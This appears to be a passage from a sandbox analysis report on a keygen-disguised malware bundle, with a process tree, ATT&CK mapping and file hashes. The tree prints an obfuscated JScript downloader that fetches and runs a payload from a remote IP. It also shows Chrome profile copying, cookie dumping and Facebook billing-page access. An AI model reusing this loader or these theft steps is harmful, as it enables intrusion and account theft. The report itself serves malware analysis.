                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
                                                                                                                              4⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Loads dropped DLL
                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                              PID:2780
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
                                                                                                                                5⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:2884
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
                                                                                                                            keygen-step-1.exe
                                                                                                                            3⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:1644
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe
                                                                                                                            keygen-step-2.exe
                                                                                                                            3⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Loads dropped DLL
                                                                                                                            • Modifies system certificate store
                                                                                                                            PID:932
                                                                                                                            • C:\Users\Admin\AppData\Roaming\4322.tmp.exe
                                                                                                                              "C:\Users\Admin\AppData\Roaming\4322.tmp.exe"
                                                                                                                              4⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Loads dropped DLL
                                                                                                                              PID:2368
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\4322.tmp.exe"
                                                                                                                                5⤵
                                                                                                                                  PID:1420
                                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                    timeout /T 10 /NOBREAK
                                                                                                                                    6⤵
                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                    PID:1484
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe" >> NUL
                                                                                                                                4⤵
                                                                                                                                  PID:1808
                                                                                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                    ping 127.0.0.1
                                                                                                                                    5⤵
                                                                                                                                    • Runs ping.exe
                                                                                                                                    PID:2280
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
                                                                                                                                keygen-step-3.exe
                                                                                                                                3⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:2240
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
                                                                                                                                  4⤵
                                                                                                                                    PID:1076
                                                                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                      ping 1.1.1.1 -n 1 -w 3000
                                                                                                                                      5⤵
                                                                                                                                      • Runs ping.exe
                                                                                                                                      PID:2920
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
                                                                                                                                  keygen-step-4.exe
                                                                                                                                  3⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Loads dropped DLL
                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                  PID:2128
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
                                                                                                                                    4⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Modifies system certificate store
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:1704
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\83N41SIH1T\multitimer.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\83N41SIH1T\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
                                                                                                                                      5⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Drops file in Windows directory
                                                                                                                                      PID:2212
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\83N41SIH1T\multitimer.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\83N41SIH1T\multitimer.exe" 1 101
                                                                                                                                        6⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        PID:2764
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1LSD7BAKXS\setups.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\1LSD7BAKXS\setups.exe" ll
                                                                                                                                      5⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      PID:864
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-J296K.tmp\setups.tmp
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-J296K.tmp\setups.tmp" /SL5="$20174,1845714,55808,C:\Users\Admin\AppData\Local\Temp\1LSD7BAKXS\setups.exe" ll
                                                                                                                                        6⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Loads dropped DLL
                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                        PID:2008
                                                                                                                                        • C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                          "C:\Program Files\Internet Explorer\iexplore.exe" https://catser.inappapiurl.com/redirect/57a764d042bf8/
                                                                                                                                          7⤵
                                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                          PID:2288
                                                                                                                                          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                                                            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2288 CREDAT:275457 /prefetch:2
                                                                                                                                            8⤵
                                                                                                                                            • Modifies Internet Explorer settings
                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                            PID:2460
                                                                                                                                          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                                                            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2288 CREDAT:537610 /prefetch:2
                                                                                                                                            8⤵
                                                                                                                                            • Modifies Internet Explorer settings
                                                                                                                                            • NTFS ADS
                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                            PID:2492
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              cmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/["Wait"+"ForResponse"]();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript.Echo(),o="Object",A=Math,a=Function("b","return WScript.Create"+o+"(b)");P=(""+WScript).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=WScript.Arguments,e="WinHTTP",Z="cmd",Q=a("WinH"+"ttp.WinHttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=WScript[P+"FullName"],E="."+p;Y="Type";s[Y]=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(32-1^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp "cvbdfg" "http://45.138.26.109/?MzMwNjYx&pyri&oa1n4=xH3QMrXYbRzFFYbfLf_KRqFbNU&s2ht4=zRGUKVxo2bk6rPE5qpZDXGpbf1DBmgqVmAH16-t_d0erZOfQC5zUGwewZjn4oIUVkRpaqq3EKBmBWfiJSG-BaJZg5G_JaRELU40Vn9mbUVd8h0wRXXumJY_O4UVVkgvA5Tn637&vMDBRSMzEyMg==" "2"
                                                                                                                                              9⤵
                                                                                                                                                PID:2364
                                                                                                                                                • C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                  wsCripT //B //E:JScript 3.tMp "cvbdfg" "http://45.138.26.109/?MzMwNjYx&pyri&oa1n4=xH3QMrXYbRzFFYbfLf_KRqFbNU&s2ht4=zRGUKVxo2bk6rPE5qpZDXGpbf1DBmgqVmAH16-t_d0erZOfQC5zUGwewZjn4oIUVkRpaqq3EKBmBWfiJSG-BaJZg5G_JaRELU40Vn9mbUVd8h0wRXXumJY_O4UVVkgvA5Tn637&vMDBRSMzEyMg==" "2"
                                                                                                                                                  10⤵
                                                                                                                                                  • Blocklisted process makes network request
                                                                                                                                                  PID:668
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c 1gel7.exe
                                                                                                                                                    11⤵
                                                                                                                                                      PID:1776
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1gel7.exe
                                                                                                                                                        1gel7.exe
                                                                                                                                                        12⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:2280
                                                                                                                                              • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                                                                "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2288 CREDAT:209940 /prefetch:2
                                                                                                                                                8⤵
                                                                                                                                                • Modifies Internet Explorer settings
                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                PID:4044
                                                                                                                                              • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                                                                "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2288 CREDAT:209976 /prefetch:2
                                                                                                                                                8⤵
                                                                                                                                                • Modifies Internet Explorer settings
                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                PID:2260
                                                                                                                                              • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                                                                "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2288 CREDAT:275532 /prefetch:2
                                                                                                                                                8⤵
                                                                                                                                                • Modifies Internet Explorer settings
                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                PID:2196
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Version.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Version.exe"
                                                                                                                                        4⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                        PID:2704
                                                                                                                                        • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                          "C:\Windows\System32\WScript.exe" "C:\Program Files\unins0000.vbs"
                                                                                                                                          5⤵
                                                                                                                                            PID:1720
                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                              "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
                                                                                                                                              6⤵
                                                                                                                                              • Loads dropped DLL
                                                                                                                                              • Modifies registry class
                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                              PID:2108
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"
                                                                                                                                          4⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Drops Chrome extension
                                                                                                                                          • Modifies system certificate store
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          PID:2000
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                            5⤵
                                                                                                                                              PID:2796
                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                taskkill /f /im chrome.exe
                                                                                                                                                6⤵
                                                                                                                                                • Kills process with taskkill
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:2620
                                                                                                                                            • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                              xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y
                                                                                                                                              5⤵
                                                                                                                                              • Enumerates system info in registry
                                                                                                                                              PID:2224
                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
                                                                                                                                              5⤵
                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                                              PID:1684
                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xc8,0xcc,0xd0,0x9c,0xd4,0x7fef5f16e00,0x7fef5f16e10,0x7fef5f16e20
                                                                                                                                                6⤵
                                                                                                                                                  PID:2464
                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1072,10542724004525373025,12497895900156926324,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1332 /prefetch:8
                                                                                                                                                  6⤵
                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                  PID:2036
                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1072,10542724004525373025,12497895900156926324,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1100 /prefetch:2
                                                                                                                                                  6⤵
                                                                                                                                                    PID:2100
                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1072,10542724004525373025,12497895900156926324,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1652 /prefetch:8
                                                                                                                                                    6⤵
                                                                                                                                                      PID:1700
                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1072,10542724004525373025,12497895900156926324,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2140 /prefetch:1
                                                                                                                                                      6⤵
                                                                                                                                                        PID:1488
                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1072,10542724004525373025,12497895900156926324,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1956 /prefetch:1
                                                                                                                                                        6⤵
                                                                                                                                                          PID:1320
                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1072,10542724004525373025,12497895900156926324,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1940 /prefetch:1
                                                                                                                                                          6⤵
                                                                                                                                                            PID:1524
                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1072,10542724004525373025,12497895900156926324,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2188 /prefetch:1
                                                                                                                                                            6⤵
                                                                                                                                                              PID:1712
                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1072,10542724004525373025,12497895900156926324,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2468 /prefetch:1
                                                                                                                                                              6⤵
                                                                                                                                                                PID:2484
                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1072,10542724004525373025,12497895900156926324,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2764 /prefetch:1
                                                                                                                                                                6⤵
                                                                                                                                                                  PID:1728
                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1072,10542724004525373025,12497895900156926324,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3308 /prefetch:2
                                                                                                                                                                  6⤵
                                                                                                                                                                    PID:2044
                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1072,10542724004525373025,12497895900156926324,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1204 /prefetch:8
                                                                                                                                                                    6⤵
                                                                                                                                                                      PID:2492
                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1072,10542724004525373025,12497895900156926324,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=4760 /prefetch:8
                                                                                                                                                                      6⤵
                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                      PID:3452
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
                                                                                                                                                                  4⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Modifies system certificate store
                                                                                                                                                                  PID:1608
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe" >> NUL
                                                                                                                                                                    5⤵
                                                                                                                                                                      PID:2612
                                                                                                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                        ping 127.0.0.1
                                                                                                                                                                        6⤵
                                                                                                                                                                        • Runs ping.exe
                                                                                                                                                                        PID:1096
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    PID:2260
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    PID:2732
                                                                                                                                                                    • C:\ProgramData\7320937.exe
                                                                                                                                                                      "C:\ProgramData\7320937.exe"
                                                                                                                                                                      5⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                      PID:1624
                                                                                                                                                                    • C:\ProgramData\6036037.exe
                                                                                                                                                                      "C:\ProgramData\6036037.exe"
                                                                                                                                                                      5⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                      • Adds Run key to start application
                                                                                                                                                                      PID:1968
                                                                                                                                                                      • C:\ProgramData\Windows Host\Windows Host.exe
                                                                                                                                                                        "C:\ProgramData\Windows Host\Windows Host.exe"
                                                                                                                                                                        6⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        PID:3216
                                                                                                                                                                    • C:\ProgramData\7261534.exe
                                                                                                                                                                      "C:\ProgramData\7261534.exe"
                                                                                                                                                                      5⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                      PID:1224
                                                                                                                                                                      • C:\ProgramData\7261534.exe
                                                                                                                                                                        "{path}"
                                                                                                                                                                        6⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                        PID:3632
                                                                                                                                                                    • C:\ProgramData\1748206.exe
                                                                                                                                                                      "C:\ProgramData\1748206.exe"
                                                                                                                                                                      5⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                      PID:3108
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                    • Adds Run key to start application
                                                                                                                                                                    PID:3144
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                      5⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      PID:3332
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                      5⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                      PID:3560
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                      5⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                      PID:1808
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                      5⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                      PID:836

                                                                                                                                                            Network

                                                                                                                                                            MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                            Persistence

                                                                                                                                                            Registry Run Keys / Startup Folder

                                                                                                                                                            1
                                                                                                                                                            T1060

                                                                                                                                                            Defense Evasion

                                                                                                                                                            Modify Registry

                                                                                                                                                            3
                                                                                                                                                            T1112

                                                                                                                                                            Install Root Certificate

                                                                                                                                                            1
                                                                                                                                                            T1130

                                                                                                                                                            Credential Access

                                                                                                                                                            Credentials in Files

                                                                                                                                                            4
                                                                                                                                                            T1081

                                                                                                                                                            Discovery

                                                                                                                                                            Query Registry

                                                                                                                                                            3
                                                                                                                                                            T1012

                                                                                                                                                            System Information Discovery

                                                                                                                                                            4
                                                                                                                                                            T1082

                                                                                                                                                            Remote System Discovery

                                                                                                                                                            1
                                                                                                                                                            T1018

                                                                                                                                                            Collection

                                                                                                                                                            Data from Local System

                                                                                                                                                            4
                                                                                                                                                            T1005

                                                                                                                                                            Command and Control

                                                                                                                                                            Web Service

                                                                                                                                                            1
                                                                                                                                                            T1102

                                                                                                                                                            Replay Monitor

                                                                                                                                                            Loading Replay Monitor...

                                                                                                                                                            Downloads

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
                                                                                                                                                              MD5

                                                                                                                                                              2817973d85028defb30f4c7656bcf198

                                                                                                                                                              SHA1

                                                                                                                                                              66e830ec37e37368862bc6c9cd007bcbfa0b5789

                                                                                                                                                              SHA256

                                                                                                                                                              cb54621cce9afa594be328d91e469e10b3548d12d5b64bab27fb04fc80ea53e2

                                                                                                                                                              SHA512

                                                                                                                                                              e56727f96d09bf86cc4f62c2329c582df83c6c81ec40ddb0ecc5f4a4b7518e70dc9aa7f7f3e7e568666f7910fb4f766c912849956fb927bf8543227f8620ca98

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                                                                                                                                                              MD5

                                                                                                                                                              65b49b106ec0f6cf61e7dc04c0a7eb74

                                                                                                                                                              SHA1

                                                                                                                                                              a1f4784377c53151167965e0ff225f5085ebd43b

                                                                                                                                                              SHA256

                                                                                                                                                              862a8cf0e5561c848145a1a1f464acf77f92a3b15cc43722a7208701f60a2fcd

                                                                                                                                                              SHA512

                                                                                                                                                              e9030cd609f42fb616e5bac3a5203ae46bbae9ec95682432a367f8805cdaa3e30c18a732ceddb0545ac653d543348a6728866149d2822752c80948066bfdf3da

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat
                                                                                                                                                              MD5

                                                                                                                                                              a12e7acce9c54e8f477830c938cd5bb7

                                                                                                                                                              SHA1

                                                                                                                                                              482ac6ae9ea9ab1673e1444269bba2ef7a86794c

                                                                                                                                                              SHA256

                                                                                                                                                              b5433a43058d8b81958e13064f7d5485b787d6812513600c27b913dc5c3b3bd0

                                                                                                                                                              SHA512

                                                                                                                                                              5198b9b7f7ab17a0173a5eed18f3b1906ab3fc64da62cfb765ff43539acdcf3a0eafeefe6184f51f1fbebaacdb0bdf422572b4b3ba70de0b116c779f5e1b7174

